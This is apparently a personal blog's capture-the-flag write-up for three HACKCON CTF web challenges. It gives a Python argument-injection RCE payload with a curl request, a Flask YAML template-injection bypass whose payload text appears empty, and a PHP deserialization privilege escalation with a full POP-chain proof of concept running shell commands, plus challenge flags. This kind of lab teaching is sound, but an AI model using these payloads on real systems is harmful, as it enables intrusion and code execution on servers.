rootđź’€senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
HACKCON CTF
Challenges-:
- Web-:
- Processed Subscription
- Flask ain’t no markup language
- Zeezy’s notes
Web
Processed Subscription
- Source code analysis, code-:
@app.route('/run_file', methods=['GET'])
def run_code():
filename = request.args.get("code")
if filename.endswith(".py"):
response = subprocess.Popen(["python3",filename],stdout=-1).communicate()
response = response[0].decode()
print(response)
else:
response = "Invalid file type"
return jsonify({'result': response})
- The route
run_fileis vulnerable to argument injection.An attacker can control the filename variable and triggerargument injectionto Remote Code Exection on the server. - Testing it on a python interpreter before triggering it on the server.
- Normally, Python should only execute a file in this state and should not be vulnerable to
argument injection. - Explaining the payload-:
-c\neval(\"__import__('os').system('id')\")
- The
-cswitch triggers the python interpreter, then we use\nto slip to the next line.Then, in the next line, we activate our payload.If we try it with the python interpreter, it’ll be something like this.
- Final Payload-:
-c%0aeval(\"__import__(\'os\').system('cat%20flag.txt')\")%23.py - Flag-:
gdscCTF{l0l_tw34k1ng_withSubpr0c3ss}
curl -G https://chall1.pxxl.xyz/run_file -d "code=-c%0aeval(\"__import__(\'os\').system('cat%20flag.txt')\")%23.py"
{"result":"gdscCTF{l0l_tw34k1ng_withSubpr0c3ss}\n"}
Flask ain’t no Markup Language
- Vulnerability is Flask Server Side Template Injection in
yaml.While executing it, our payload will be place in yaml syntax e.g
x: ""
- Final payload-:
x: ""
- You can bypass the filtered strings by setting it to uppercase and passing it to python’s lower function as soon as it is parsed.Lastly. the word
flaggets filtered which you can bypass with regex e.gfl?? should match flag. - Flag-:
gdscCTF{4c4dae5677c29dcdcd06ba88565602fa}
Zeezy’s notes
- Vulnerability-: Php Insecure Deserialization(Privesc to Remote Code Execution)
Source Code Analysis (Privilege Escalation)
- Welcome.php-:
/ Check cookie
if (!isset($_COOKIE['APP_SESSID'])) {
header("Location: login.php");
exit;
}
// Decode + unserialize cookie
$data = unserialize(base64_decode(urldecode($_COOKIE['APP_SESSID'])),["allowed_classes" => ["User"]]);
// Safety check
if (empty($data->username) && empty($data->role)) {
header("Location: login.php");
exit;
}
$username = $data->username;
$role = $data->role;
// Verify username in DB
$stmt = $db->prepare("SELECT * FROM users WHERE username = :username");
$stmt->bindValue(':username', $username, SQLITE3_TEXT);
$result = $stmt->execute()->fetchArray(SQLITE3_ASSOC);
if (!$result) {
header("Location: login.php");
exit;
}
// Redirect admin
if ($role === "admin") {
header("Location: admin.php");
exit;
}
- The main sink in this code is caused by
unserialize()in php which deserilaizes code and while performing this process, it executes code.It unserializes the cookie and picks the variableusernamewhich is checked against the db and validated. Although, theroleis checked with an if statement and not based on the db.We can solve this by creating a validUserobject with theroleset toadmin.User.php-:
<?php
class User {
public $username;
public $role;
// Constructor to initialize a new User object
public function __construct($username, $role = "user") {
$this->username = $username;
$this->role = $role;
}
}
?>
- Proof of concept-:
<?php
class User {
public $username;
public $role;
}
//Create a new object
$user = new User;
$user->username = "z";
$user->role = "admin";
$payload = urlencode(base64_encode(serialize($user)));
echo $payload;
?>
- Admin privileges
Remote Code Execution with a custom gadget
- Most times,PHP object injection is not straight forward as displayed above. It requires abusing some functions to hit your desired aim which is the beauty of
pop chains.It requires abusing magic methods which are triggered when a desired condition is met which we’ll see below.E.g you might have a vulnerable class but might need other classes to trigger it because of their magic methods. - Source code of Analysis of
admin.php, Code’s sink-:
if (isset($_COOKIE['ADMIN_NOTES'])) {
$notes = unserialize(
base64_decode(urldecode($_COOKIE['ADMIN_NOTES']))
);
if (!is_array($notes)) {
$notes = [];
}
}
- Unserialize() deserializes the
ADMIN_NOTEScookie in the admin page.
Building the POP chain
- It starts from
Hidden.php-:
<?php
class Hidden {
public $command;
public function __construct($command){
$this->command = $command;
}
public function __invoke() {
echo system($this->command);
}
}
?>
- The magic method
__invokeexecutes any string passed tocommandas a shell command.You can only trigger__invokeif the object is treated like a function. - It moves us to class
Call.Call.php-:
<?php
class Call
{
public $called;
public function __get($task)
{
($this->called)();
}
}
?>
-
The
Callclass requires the variablecalledwhich get triggered by__getas a function.__getis only triggered if the code tries to access an inaccessible attribute in the object. To triggerHidden, we’ll pass it toCallto trigger it because$this->calledis treated as a function which triggers__invoke. -
The next stop is
Work.php.Work.php-:
<?php
class Work
{
public $task;
public function __toString()
{
$this->task->action;
}
}
?>
- It uses the
__toStringfunction to access$this->taskwhich tries to access attributesactionwhich will obviously be non-existent inCall.This will be our next trigger point to execute__get.Although,__toStringis only treated triggered if treated as a string e.g passed to functionechowhich will move us to classNote. User.php-:
<?php
ob_start();
class Note {
private $title;
private $content;
private $createdAt;
public $mystery;
public function __construct($title, $content) {
$this->title = $title;
$this->content = $content;
$this->createdAt = date("Y-m-d H:i:s");
}
// Getters
public function getTitle() {
return $this->title;
}
public function getContent() {
return $this->content;
}
public function getCreatedAt() {
return $this->createdAt;
}
public function __destruct() {
if (!empty($this->mystery)) {
echo $this->mystery;
}
}
}
ob_end_flush();
?>
- You’ll notice there is a public attribute
mysterywhich is passed to__destructtreatsmysteryas a string which helps us to trigger__toString. Well, we don’t need to worry about__destructbecause it gets triggered as soon unserialize is done unserializing the object.
public function __destruct() {
if (!empty($this->mystery)) {
echo $this->mystery;
}
- Proof of concept-:
<?php
class Note {
private $title;
private $content;
private $createdAt;
public $mystery;
public function __construct($title, $content) {
$this->title = $title;
$this->content = $content;
$this->createdAt = date("Y-m-d H:i:s");
}
}
class Call
{
public $called;
public function __get($task)
{
($this->called)();
}
}
class Hidden {
public $command;
public function __construct($command){
$this->command = $command;
}
public function __invoke() {
echo system($this->command);
}
}
class Work
{
public $task;
public function __toString()
{
$this->task->action;
}
}
//Prepping up hidden
$hidden = new Hidden('id'); //Tweak me
//Prepping up Call and passing hidden
$call = new Call;
$call->called = $hidden;
//Prepping up Work and passing call
$work = new Work;
$work->task = $call;
//Prepping up notes and passing Work
$notes = new Note("pwned","pwned");
$notes->mystery = $work;
$payload = urlencode(base64_encode(serialize($notes)));
echo $payload;
?>
- RCE achieved-:
- Reading the flag-:
- Flag-:
gdscCTF{750bbadee6e299d30c9784972a28f0cb}